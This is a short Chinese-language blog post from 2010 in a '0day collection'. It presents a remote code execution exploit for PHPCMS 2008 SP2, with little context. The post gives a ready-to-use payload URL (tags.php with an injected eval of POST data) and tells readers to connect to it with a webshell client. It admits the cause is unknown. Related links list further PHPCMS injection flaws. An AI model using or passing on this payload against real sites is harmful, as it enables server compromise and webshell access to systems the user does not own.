很老的一个PHPCMS2008 SP2 0day

2010, September 11, 2:36 PM. oday收藏
Submitted by admin

http://URL/tags.php?id={${${eval($_POST[x])}}}

直接拿一句话连接以上地址.

这漏洞是在分析某网站日志的时候看到有人POST数据的,但是找了好几个版本,都不知道成因是什么.

哪位大大知道的话告诉我一声啊.

 

来源

http://hi.baidu.com/luc1f3r%5F/blog/item/50a903673df15b6e0d33faed.html

Tags: phpcms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
phpcms V9 BLind SQL Injection Vulnerability (浏览: 14857, 评论: 0)
Phpcms 2008 flash_upload.php文件注入漏洞 (浏览: 15816, 评论: 0)
Phpcms 2008 query.php SQL注入漏洞 (浏览: 9089, 评论: 0)
Phpcms 2008 space.api.php SQL注入漏洞 (浏览: 7783, 评论: 0)
Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行 (浏览: 10724, 评论: 0)
phpcms 0day一枚 (浏览: 13787, 评论: 0)
phpcms2008 sp3通杀0day (浏览: 8378, 评论: 0)
phpcms2008sp4 最新sql注入 (浏览: 9649, 评论: 0)
phpcms2008sp4 IIS下下载任意文件漏洞 (浏览: 10966, 评论: 0)
phpcms2008 sp3通杀0day (浏览: 10804, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):